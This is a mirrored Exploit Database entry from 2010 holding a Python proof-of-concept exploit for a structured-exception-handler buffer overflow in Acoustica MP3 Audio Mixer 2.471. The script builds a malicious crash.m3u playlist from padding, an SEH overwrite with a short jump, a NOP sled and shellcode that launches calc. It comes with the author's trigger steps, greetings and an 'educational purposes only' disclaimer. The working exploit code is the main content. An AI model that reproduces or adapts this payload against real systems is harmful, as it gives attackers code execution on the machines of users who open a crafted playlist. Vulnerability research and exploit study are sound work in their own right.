Acoustica MP3 Audio Mixer 2.471 – Extended .M3U Directives (SEH)

• Exploit Database
• 15 阅读

• 作者： Carlos Mario Penagos Hollmann
  日期： 2010-09-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14959/

• # Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
  # Date: September 8 2010
  # Author: Carlos Hollmann 
  # Software Link: http://www.acoustica.com/downloading.asp?p=1
  # Version: 2.471
  # Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
  # CVE : 
  
  
  #__________________ ____ __ _____ ________
  # / ____/ / | |/ / ____/ | / / //_//_/ | / / ____/
  #/ __/ / /| | / / __/ /|/ / ,< / //|/ / / __
  # / /___/ /___| |/ / /___/ /|/ /| |_/ // /|/ /_/ /
  #/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ 
  
  # COLOMBIA presents.............
  #PoC fromD3V!L FucK3r http://www.exploit-db.com/exploits/9213/
  #
  #	Carlos Mario Penagos Hollmann A.K.A Elvenkingshogilord@gmail.com
  #	Extended M3U directives
  
  # 	Background from http://hanna.pyxidis.org/tech/m3u.html
  
  
   
  #	The software doesn'thandle correctly M3U's header and extra info when is being imported on a open sound group.
  # 	Trigger: launch app, open an existing sound group i.e(C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp) then import the crash.m3u and....KaaaaBooom!!
  #
  # 
  # Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia 
  #	!!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!
  	
  
  
  
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # I do not want anyone to use this script
  # for malicious and/or illegal purposes
  # I cannot be held responsible for any illegal use.
   
  # Note : you are not allowed to edit/modify this code. 
  # If you do, I will not be held responsible for any damages this may cause.
  
  #!/usr/bin/python
  
  
  magic 	= "crash.m3u"
  
  
  vuln 	= "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for anyvalue \x1b,\x0a.........
  
  
  junk 		=	"\x41" * 816
  ds_eax 		=	"\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX
  morejunk 	=	"\x42" * 8308
  nSEH 		=	"\xEB\x06\x90\x90" #short jmp 6 bytes 
  SEH 		=	"\x3F\x28\xD1\x72"#SEH Handler
  nops 		=	"\x90" * 10 #landing padd
  shellcode	=	"\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thankssud0, any other shell works toojust remove "\x00\x0a"
  payload	=	vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode
  
  file = open(magic , 'w')
  file.write(payload)
  file.close()